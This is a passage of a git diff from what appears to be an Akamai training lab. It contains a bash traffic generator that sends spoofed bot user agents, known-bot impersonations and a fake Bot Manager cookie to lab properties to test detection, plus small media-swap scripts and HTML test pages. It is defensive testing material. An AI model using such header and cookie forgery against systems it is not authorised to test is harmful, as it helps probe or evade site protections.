"aka-sit") HEADERHOLDER1="X-Abuse-Info: New Relic Synthetics Monitor"; ;;
|
||||
"aka-soc") UAHOLDER+=" socialrank.io"; ;;
|
||||
"aka-war") UAHOLDER+=" europarchive.org"; ;;
|
||||
"aka-wse") UAHOLDER+=" femtosearch.com"; ;;
|
||||
"tra-ikb") UAHOLDER+=" amazon route 53"; ;;
|
||||
"tra-dvf") UAHOLDER+=" ruby microsoft atl native"; ;;
|
||||
"tra-htl") UAHOLDER+=" winhttprequest"; ;;
|
||||
"tra-wsl") UAHOLDER+=" httpful"; ;;
|
||||
"tra-osc") UAHOLDER+=" mercury.postlight.com"; ;;
|
||||
"tra-hbt") UAHOLDER+=" prerender"; ;;
|
||||
"tra-dcb") UAHOLDER+=" semantic"; ;;
|
||||
"tra-agc") UAHOLDER+=" openhose.org"; ;;
|
||||
"tra-req") HEADERHOLDER1="Accept-Language: en"; UAHOLDER+=" mozilla./"; ;;
|
||||
"act-cok") COOKIEHOLDER="ak_bmsc=foobar; bm_mi=foobar"; ;;
|
||||
*) echo -e 'Oops... invalid argument!'; exit; ;;
|
||||
esac
|
||||
elif [ ${test_string[0]} = 'bmp' ]; then
|
||||
if [ $verbose -eq 1 ]; then echo -e "> Bot Manager Premier (bmp) found"; fi
|
||||
if [[ ${test_string[5]} != '' ]]; then
|
||||
DATAHOLDER="${test_string[5]}"
|
||||
fi
|
||||
test_string[5]="BMP";
|
||||
elif [ ${test_string[0]} = 'man' ]; then
|
||||
if [ $verbose -eq 1 ]; then echo -e "> Manual test found"; fi
|
||||
if [[ ${test_string[2]} =~ ^(POST)?$ ]]; then DATAHOLDER=${test_string[5]}; fi
|
||||
test_string[5]="Manual";
|
||||
else
|
||||
if [ $verbose -eq 1 ]; then echo -e "> No type found"; fi
|
||||
fi
|
||||
|
||||
description="";
|
||||
if [ ${test_string[5]} = 'aka-arb' ]; then
|
||||
description="Academic or Research Bots"
|
||||
elif [ ${test_string[5]} = 'aka-seo' ]; then
|
||||
description="SEO, Analytics or Marketing Bots"
|
||||
elif [ ${test_string[5]} = 'aka-eco' ]; then
|
||||
description='E-Commerce Search Engine Bots'
|
||||
elif [ ${test_string[5]} = 'tra-ikb' ]; then
|
||||
description='Impersonators of Known Bots'
|
||||
elif [ ${test_string[5]} = 'tra-hbt' ]; then
|
||||
description='Headless Browsers/Automation Tools'
|
||||
elif [ ${test_string[5]} = 'act-cok' ]; then
|
||||
description='Cookie Integrity Failed'
|
||||
else
|
||||
description='not equal';
|
||||
fi
|
||||
|
||||
export now=$(date)
|
||||
echo -e "\t $now : [ $env ] [ $description ]"
|
||||
H9+=${UAHOLDER}
|
||||
H5+=${COOKIEHOLDER}
|
||||
URL="${test_string[3]}${test_string[4]}${PARAMHOLDER}"
|
||||
CURL='/usr/bin/curl'
|
||||
CURLARGS="-i -k -s -S -v -m 30 $method $PROTOCOLHOLDER --connect-to ::$1"
|
||||
echo -e "${test_string[3]}${test_string[4]}"
|
||||
if [[ ${test_string[2]} =~ ^(POST)?$ ]]; then
|
||||
if [ $verbose -eq 1 ]; then echo -e "> using $CURL $CURLARGS \"$URL\" -H \"$H1\" -H \"$H2\" -H \"$H3\" -H \"$H4\" -H \"$H5\" -H \"$H6\" -H \"$H7\" -H \"$H8\" -H \"$H9\" -H \"Pragma: akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable, akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no, akamai-x-get-request-id, akamai-x-request-trace, akamai-x--meta-trace, akama-xi-get-extracted-values\" -H \"$H10\" -H \"$HEADERHOLDER1\" -H \"$HEADERHOLDER2\" -H \"$HEADERHOLDER3\" --data-raw \"$DATAHOLDER\""; fi
|
||||
$CURL $CURLARGS "$URL" -H "$H1" -H "$H2" -H "$H3" -H "$H4" -H "$H5" -H "$H6" -H "$H7" -H "$H8" -H "$H9" -H "Pragma: akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable, akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no, akamai-x-get-request-id, akamai-x-request-trace, akamai-x--meta-trace, akama-xi-get-extracted-values" -H "$H10" -H "$HEADERHOLDER1" -H "$HEADERHOLDER2" -H "$HEADERHOLDER3" --data-raw "$DATAHOLDER" &> .temp
|
||||
else
|
||||
if [ $verbose -eq 1 ]; then echo -e "> using $CURL $CURLARGS \"$URL\" -H \"$H1\" -H \"$H2\" -H \"$H3\" -H \"$H4\" -H \"$H5\" -H \"$H6\" -H \"$H7\" -H \"$H8\" -H \"$H9\" -H \"Pragma: akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable, akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no, akamai-x-get-request-id, akamai-x-request-trace, akamai-x--meta-trace, akama-xi-get-extracted-values\" -H \"$HEADERHOLDER1\" -H \"$HEADERHOLDER2\" -H \"$HEADERHOLDER3\""; fi
|
||||
$CURL $CURLARGS "$URL" -H "$H1" -H "$H2" -H "$H3" -H "$H4" -H "$H5" -H "$H6" -H "$H7" -H "$H8" -H "$H9" -H "Pragma: akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable, akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no, akamai-x-get-request-id, akamai-x-request-trace, akamai-x--meta-trace, akama-xi-get-extracted-values" -H "$HEADERHOLDER1" -H "$HEADERHOLDER2" -H "$HEADERHOLDER3" &> .temp
|
||||
fi
|
||||
echo "checker" >> .temp
|
||||
regexhtc='^HTTP\/[0-9]\.[0-9][ ]([[:digit:]]{3})|^curl:.*error: (.*)|^HTTP/2[ ]([[:digit:]]{3})'
|
||||
regexref='(#|[[:space:]])([[:digit:]]+\.[a-zA-Z0-9]+\.[a-zA-Z0-9]{10,}\.[a-zA-Z0-9]+)'
|
||||
regexdie='.*doctype.*|^(^$)$'
|
||||
stopv=0
|
||||
http="Timeout"
|
||||
refe="Unable to get AK_REFERENCE_ID"
|
||||
while IFS= read -r liner; do
|
||||
liner="${liner//./.}"
|
||||
liner="${liner//#/#}"
|
||||
if [[ $liner =~ $regexhtc ]]; then http="${BASH_REMATCH[1]}${BASH_REMATCH[2]}${BASH_REMATCH[3]}"; http=${http%$'\r'}; http=${http%$' '}; fi
|
||||
if [[ $liner =~ $regexref ]]; then refe="${BASH_REMATCH[2]}"; fi
|
||||
if [ $verbose -eq 1 ]; then if ! [[ $liner =~ $regexdie || $stopv -eq 1 ]]; then echo "$liner"; else stopv=1; fi; fi
|
||||
done < .temp
|
||||
echo -e "${http}"
|
||||
# echo -e "${epoch}"
|
||||
# echo -e "${refe}"
|
||||
echo -e ""
|
||||
if [[ ${filetim} != '' ]]; then exportcsv; fi
|
||||
else
|
||||
echo -e 'Oops... wrong method!'
|
||||
exit
|
||||
fi
|
||||
}
|
||||
|
||||
property=$3
|
||||
|
||||
verbose=0
|
||||
filetim=""; filecnf=""; fileref=""
|
||||
PFIPi=""; PEIPi=""; SFIPi=""; SEIPi=""
|
||||
PFIP="23.54.162.184:23.63.22.131:23.63.22.169:186.177.65.217:186.177.65.208"
|
||||
PEIP="72.246.84.4:23.40.180.4:23.48.16.4"
|
||||
SFIP="23.50.49.10:23.50.55.19:23.50.55.25:23.50.51.50:23.50.51.51"
|
||||
SEIP="23.199.36.2:23.34.4.4:23.59.184.2"
|
||||
PFFQ="a1.g.akamai.net"
|
||||
PEFQ="e1.a.akamaiedge.net"
|
||||
SFFQ="a1.g.akamai-staging.net"
|
||||
SEFQ="e1.a.akamaiedge-staging.net"
|
||||
rules=()
|
||||
headerorder=()
|
||||
while getopts "c:r:vedm" option; do
|
||||
case $option in
|
||||
c)
|
||||
filecnf=${OPTARG};;
|
||||
v)
|
||||
verbose=1 ;;
|
||||
r)
|
||||
fileref=${OPTARG};;
|
||||
e)
|
||||
filetim=$(date +%s) ;;
|
||||
d)
|
||||
PFIP=""
|
||||
PEIP=""
|
||||
SFIP=""
|
||||
SEIP="";;
|
||||
m)
|
||||
helpconf
|
||||
exit;;
|
||||
esac
|
||||
done
|
||||
if (( $OPTIND == 1 )); then
|
||||
help
|
||||
exit
|
||||
fi
|
||||
if [[ ${filetim} != '' ]]; then
|
||||
export_type=""
|
||||
export_payload=""
|
||||
ACRONYMA=('man' 'atg' 'bms' 'bmp' 'krs-cmd' 'krs-xss' 'krs-dos' 'krs-iht' 'krs-php' 'krs-rfi' 'krs-sql' 'krs-trj' 'aag-wat' 'aag-wpr' 'aag-sql' 'aag-xss' 'aag-lfi' 'aag-rfi' 'aag-cmi' 'aag-wpl' 'penalty' 'aka-arb' 'aka-asc' 'aka-bib' 'aka-eco' 'aka-eag' 'aka-fia' 'aka-fis' 'aka-job' 'aka-mda' 'aka-new' 'aka-onl' 'aka-rss' 'aka-seo' 'aka-sit' 'aka-soc' 'aka-war' 'aka-wse' 'tra-ikb' 'tra-dvf' 'tra-htl' 'tra-wsl' 'tra-osc' 'tra-hbt' 'tra-dcb' 'tra-agc' 'tra-req' 'act-cok')
|
||||
ACRONYMB=('Manual' 'Attack Group' 'Bot Manager Standard' 'Bot Manager Premier' 'Command Injection' 'Cross-Site Scripting' 'DDOS' 'Invalid HTTP' 'PHP Injection' 'Remote File Inclusion' 'SQL Injection' 'Trojan' 'Web Attack Tool' 'Web Protocol Attack' 'SQL Injection' 'Cross-Site Scripting' 'Local File Inclusion' 'Remote File Inclusion' 'Command Injection' 'Web Platform Attack' 'Penalty Box' 'Academic or Research Bots' 'Automated Shopping Cart and Sniper Bots' 'Business Intelligence Bots' 'E-Commerce Search Engine Bots' 'Enterprise Data Aggregator Bots' 'Financial Account Aggregator Bots' 'Financial Services Bots' 'Job Search Engine Bots' 'Media or Entertainment Search Bots' 'News Aggregator Bots' 'Online Advertising Bots' 'RSS Feed Reader Bots' 'SEO Analytics or Marketing Bots' 'Site Monitoring and Web Development Bots' 'Social Media or Blog Bots' 'Web Archiver Bots' 'Web Search Engine Bots' 'Impersonators of Known Bots' 'Development Frameworks' 'HTTP Libraries' 'Web Services Libraries' 'Open Source Crawlers/Scraping Platforms' 'Headless Browsers/Automation Tools' 'Declared Bots (Keyword Match)' 'Aggressive Web Crawlers' 'Request Anomaly' 'Cookie Integrity Failed' 'Cookie Integrity Failed')
|
||||
if [ $verbose -eq 1 ]; then echo -e "> exporting $(basename ${filecnf})_${filetim}.csv"; fi
|
||||
echo "Environment,HTTP Code,Checker reference,Akamai reference,Type,Payload,URL" > "$(basename ${filecnf})_${filetim}.csv"
|
||||
fi
|
||||
readconfig $filecnf $property
|
|
@ -0,0 +1,15 @@
|
|||
#! /bin/bash
|
||||
|
||||
cd /usr/share/nginx/html/learn
|
||||
|
||||
export oldDog=$(cat $1_dog.txt)
|
||||
echo 'oldDog: '$oldDog
|
||||
if [ $oldDog = 'cream' ];then
|
||||
cp golden.png.bak $1_dog.png
|
||||
echo golden > $1_dog.txt
|
||||
echo 'newDog: golden'
|
||||
elif [ $oldDog = 'golden' ];then
|
||||
cp cream.png.bak $1_dog.png
|
||||
echo cream > $1_dog.txt
|
||||
echo 'newDog: cream'
|
||||
fi;
|
|
@ -0,0 +1,15 @@
|
|||
#! /bin/bash
|
||||
|
||||
cd /usr/share/nginx/html/learn
|
||||
|
||||
export oldVideo=$(cat $1_video.txt)
|
||||
echo 'oldVideo: '$oldVideo
|
||||
if [ $oldVideo = 'globe' ];then
|
||||
cp akam.mp4.bak $1_video.mp4
|
||||
echo akam > $1_video.txt
|
||||
echo 'newVideo: akam'
|
||||
elif [ $oldVideo = 'akam' ];then
|
||||
cp globe.mp4.bak $1_video.mp4
|
||||
echo globe > $1_video.txt
|
||||
echo 'newVideo: globe'
|
||||
fi;
|
|
@ -0,0 +1,79 @@
|
|||
<!-- This is the updated HTML file that uses w3.js and w3.css -->
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
|
||||
<head>
|
||||
<title>Bot Manager Test</title>
|
||||
<!-- Add the links to w3.js and w3.css -->
|
||||
<script src="https://www.w3schools.com/lib/w3.js"></script>
|
||||
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
|
||||
</head>
|
||||
|
||||
<body>
|
||||
<div class="w3-container" id="root" style="max-width:1400px;margin:auto;">
|
||||
<div class="w3-container w3-teal">
|
||||
<h1>Bot Manager Test</h1>
|
||||
</div>
|
||||
<div class="w3-container w3-pale-blue">
|
||||
<p id="">Click the button to send sample bot traffic to your ${PROPERTY_HOSTNAME}.</p>
|
||||
<button class="w3-button w3-blue" onclick="runTest()">START TEST</button>
|
||||
<p></p>
|
||||
</div>
|
||||
<div class="w3-container w3-dark-grey">
|
||||
<p id="">Test result</p>
|
||||
</div>
|
||||
<div id="loading" class="w3-modal w3-animate-zoom w3-animate-opacity">
|
||||
<div class="w3-modal-content w3-card-4" style="width:350px;">
|
||||
<div class="w3-container">
|
||||
<img class="w3-circle" style="width:100%;" src="/learn/loading.gif" />
|
||||
</div>
|
||||
<div class="w3-container">
|
||||
<p> Sending sample bot traffic...</p>
|
||||
<p> This can take around 1 minute.</p>
|
||||
<br/>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<div class="w3-container w3-light-grey">
|
||||
<div class="" id="output">
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<script>
|
||||
var hostname = location.hostname;
|
||||
var array = hostname.split('.');
|
||||
uid = array[0];
|
||||
console.log(uid);
|
||||
|
||||
function runTest() {
|
||||
document.getElementById("output").innerHTML = "";
|
||||
w3.getHttpObject('/lab/bm/run?property=' + uid, showOutput);
|
||||
document.getElementById("loading").style.display = "block";
|
||||
|
||||
}
|
||||
|
||||
function showOutput(output) {
|
||||
// document.getElementById("output").innerHTML += '<p>##### This tester sent the following Bot traffic to your property. #####</p>'
|
||||
document.getElementById("output").innerHTML += '<p><b>UTC Time : [ Akamai Network Type ] [Bot Type], Test URL, Response Code</b></p>'
|
||||
|
||||
// console.log(output);
|
||||
const outputArray = output.toString().split('\t');
|
||||
// console.log(outputArray);
|
||||
|
||||
for (var i = 0; i < outputArray.length; i++) {
|
||||
var line = outputArray[i];
|
||||
// console.log(line);
|
||||
document.getElementById("output").innerHTML += line + '<br/>';
|
||||
}
|
||||
document.getElementById("output").innerHTML += '<br/><p>##### Go to your Security Center to monitor this Bot traffic. #####</p>'
|
||||
document.getElementById("output").innerHTML += '<p></p><p></p>'
|
||||
|
||||
document.getElementById("loading").style.display = "none";
|
||||
|
||||
}
|
||||
|
||||
</script>
|
||||
</body>
|
||||
|
||||
</html>
|
|
@ -0,0 +1,241 @@
|
|||
<!-- This is the updated HTML file that uses w3.js and w3.css -->
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
|
||||
<head>
|
||||
<title>Image & Video Manager Purge</title>
|
||||
<!-- Add the links to w3.js and w3.css -->
|
||||
<script src="https://www.w3schools.com/lib/w3.js"></script>
|
||||
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
|
||||
<style>
|
||||
p{
|
||||
font-size:small;
|
||||
}
|
||||
</style>
|
||||
</head>
|
||||
|
||||
<body>
|
||||
<div class="w3-container" id="root" style="max-width:1400px;margin:auto;">
|
||||
<div class="w3-container w3-teal">
|
||||
<h1>Image & Video Manager Purge Test</h1>
|
||||
</div>
|
||||
<div class="w3-container w3-pale-blue" id="button1">
|
||||
<p id="">Click the button to start. Your images and videos will be shown below.</p>
|
||||
<button class="w3-button w3-blue" onclick="generateImageVideo()">Generate Image and Video</button>
|
||||
<p></p>
|
||||
</div>
|
||||
<div class="w3-container w3-black" id="msg1">
|
||||
<h4>NOTE: Please open 'Developer Tools' and check 'Disable Cache' option under 'Network' tab.</h4>
|
||||
</div>
|
||||
<div id="loading" class="w3-modal w3-animate-zoom w3-animate-opacity">
|
||||
<div class="w3-modal-content w3-card-4">
|
||||
<img class="w3-circle" style="width:100%"
|
||||
src="https://i.pinimg.com/originals/9f/5b/a6/9f5ba6b38c4259a23c5965a8164ec86f.gif" />
|
||||
</div>
|
||||
</div>
|
||||
<div class="w3-container w3-light-grey" id="body">
|
||||
<div class="w3-row-padding w3-margin-top">
|
||||
<div class="w3-third">
|
||||
<div class="w3-card w3-white">
|
||||
<div class="w3-display-container">
|
||||
<img id="originImage" src="http://origin-33.akamai-lab.com/learn/black.jpg"
|
||||
style="width:100%">
|
||||
<div class="w3-display-topright w3-container">
|
||||
<button class="w3-button w3-blue w3-border w3-ripple" onclick="replaceImage()">Click to
|
||||
Replace</button>
|
||||
</div>
|
||||
</div>
|
||||
<div class="w3-container">
|
||||
<h5>Origin Image</h5>
|
||||
<p id="originImageURL"></p>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<div class="w3-third">
|
||||
<div class="w3-card w3-white">
|
||||
<div class="w3-display-container">
|
||||
<img id="cachedImage" src="http://origin-33.akamai-lab.com/learn/black.jpg"
|
||||
style="width:100%">
|
||||
<div class="w3-display-topright w3-container">
|
||||
<button class="w3-button w3-blue w3-border w3-ripple" onclick="reloadImage()">Click to
|
||||
Reload</button>
|
||||
</div>
|
||||
</div>
|
||||
<div class="w3-container">
|
||||
<h5>Optimized Image</h5>
|
||||
<p id="cachedImageURL"></p>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<div class="w3-third">
|
||||
<div class="w3-card w3-white">
|
||||
<div class="w3-display-container">
|
||||
<img id="cachedImage2" src="http://origin-33.akamai-lab.com/learn/black.jpg"
|
||||
style="width:100%">
|
||||
<div class="w3-display-topright w3-container">
|
||||
<button class="w3-button w3-blue w3-border w3-ripple" onclick="reloadImage2()">Click to
|
||||
Reload</button>
|
||||
</div>
|
||||
</div>
|
||||
<div class="w3-container">
|
||||
<h5>Optimized Image with custom query string</h5>
|
||||
<p id="cachedImageURL2"></p>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<div class="w3-row-padding w3-margin-top">
|
||||
<div class="w3-half">
|
||||
<div class="w3-card w3-white w3-display-container">
|
||||
<video style="width:100%;" controls autoplay id="originVideo">
|
||||
<source src="http://origin-33.akamai-lab.com/learn/sample23.mp4" type="video/mp4">
|
||||
Your browser does not support the video tag.
|
||||
</video>
|
||||
<div class="w3-display-topright w3-container">
|
||||
<button class="w3-button w3-blue w3-border w3-ripple" onclick="replaceVideo()">Click to
|
||||
Replace</button>
|
||||
</div>
|
||||
<div class="w3-container">
|
||||
<h5>Origin Video</h5>
|
||||
<p id="originVideoURL"></p>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<div class="w3-half">
|
||||
<div class="w3-card w3-white w3-display-container">
|
||||
<video style="width:100%;" controls autoplay id="cachedVideo">
|
||||
<source src="http://origin-33.akamai-lab.com/learn/sample23.mp4" type="video/mp4">
|
||||
Your browser does not support the video tag.
|
||||
</video>
|
||||
<div class="w3-display-topright w3-container">
|
||||
<button class="w3-button w3-blue w3-border w3-ripple" onclick="reloadVideo()">Click to
|
||||
Reload</button>
|
||||
</div>
|
||||
<div class="w3-container">
|
||||
<h5>Optimized Video</h5>
|
||||
<p id="cachedVideoURL"></p>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<p> </p>
|
||||
</div>
|
||||
|
||||
</div>
|
||||
|
||||
|
||||
<script>
|
||||
|
||||
var browserName = navigator.userAgent.toLowerCase();
|
||||
var isChrome = browserName.indexOf("chrome") > -1;
|
||||
if (!isChrome) {
|
||||
alert("Your web browser is not compatible with this page. Please use Chrome or Chrome-compatible browser.");
|
||||
}
|
||||
|
||||
|
||||
|
||||
var hostname = location.hostname;
|
||||
var array = hostname.split('.');
|
||||
uid = array[0];
|
||||
console.log(uid);
|
||||
// document.getElementById("body").style.display = "none";
|
||||
|
||||
function generateImageVideo() {
|
||||
// document.getElementById("msg1").style.display = "none";
|
||||
document.getElementById("button1").style.display = "none";
|
||||
generate();
|
||||
}
|
||||
|
||||
function generate() {
|
||||
w3.getHttpObject('/lab/ivm/generate?property=' + uid, setSrc);
|
||||
}
|
||||
|
||||
function setSrc() {
|
||||
|
||||
var originImageSrc = 'http://origin-33.akamai-lab.com/learn/' + uid + '_dog.png';
|
||||
console.log(originImageSrc);
|
||||
document.getElementById("originImage").src = originImageSrc;
|
||||
document.getElementById("originImageURL").innerHTML = originImageSrc;
|
||||
|
||||
var cachedImageSrc = 'http://' + hostname + '/learn/' + uid + '_dog.png';
|
||||
console.log(cachedImageSrc);
|
||||
document.getElementById("cachedImage").src = cachedImageSrc;
|
||||
document.getElementById("cachedImageURL").innerHTML = cachedImageSrc;
|
||||
|
||||
var cachedImageSrc2 = cachedImageSrc+'?uid=1234'
|
||||
// var cachedImageSrc2 = cachedImageSrc+'?im=Grayscale&uid=1234'
|
||||
console.log(cachedImageSrc2);
|
||||
document.getElementById("cachedImage2").src = cachedImageSrc2;
|
||||
document.getElementById("cachedImageURL2").innerHTML = cachedImageSrc2;
|
||||
|
||||
var originVideoSrc = 'http://origin-33.akamai-lab.com/learn/' + uid + '_video.mp4';
|
||||
console.log(originVideoSrc);
|
||||
document.getElementById("originVideo").getElementsByTagName("source")[0].src = originVideoSrc;
|
||||
document.getElementById("originVideo").load();
|
||||
document.getElementById("originVideoURL").innerHTML = originVideoSrc;
|
||||
|
||||
var cachedVideoSrc = 'http://' + hostname + '/learn/' + uid + '_video.mp4';
|
||||
console.log(cachedVideoSrc);
|
||||
document.getElementById("cachedVideo").getElementsByTagName("source")[0].src = cachedVideoSrc;
|
||||
document.getElementById("cachedVideo").load();
|
||||
document.getElementById("cachedVideoURL").innerHTML = cachedVideoSrc;
|
||||
|
||||
document.getElementById("body").style.display = "block";
|
||||
}
|
||||
|
||||
function replaceImage() {
|
||||
w3.getHttpObject('/lab/ivm/replace_image?property=' + uid, showImageOutput);
|
||||
}
|
||||
|
||||
function replaceVideo() {
|
||||
w3.getHttpObject('/lab/ivm/replace_video?property=' + uid, showVideoOutput);
|
||||
}
|
||||
|
||||
function reloadImage() {
|
||||
// Chrome, Brave
|
||||
var image = document.getElementById("cachedImage");
|
||||
var url = image.src;
|
||||
image.src = url+'';
|
||||
console.log('cachedImage reloaded');
|
||||
|
||||
//FireFox, Edge, Safari
|
||||
//location.reload();
|
||||
}
|
||||
|
||||
function reloadImage2() {
|
||||
// Chrome, Brave
|
||||
var image = document.getElementById("cachedImage2");
|
||||
var url = image.src;
|
||||
image.src = url;
|
||||
console.log('cachedImage reloaded');
|
||||
|
||||
//FireFox, Edge, Safari
|
||||
//location.reload();
|
||||
}
|
||||
|
||||
function reloadVideo() {
|
||||
document.getElementById("cachedVideo").load();
|
||||
console.log('cachedVideo reloaded');
|
||||
}
|
||||
|
||||
function showImageOutput(output) {
|
||||
// Chrome, Brave
|
||||
var image = document.getElementById("originImage");
|
||||
var url = image.src;
|
||||
image.src = url;
|
||||
|
||||
// FireFox, Edge, Safari
|
||||
// location.reload();
|
||||
console.log(output);
|
||||
}
|
||||
|
||||
function showVideoOutput(output) {
|
||||
var video = document.getElementById("originVideo");
|
||||
video.load();
|
||||
console.log(output);
|
||||
}
|
||||
|
||||
</script>
|
||||
</body>
|
||||
|
||||
</html>
|
Loading…
Reference in New Issue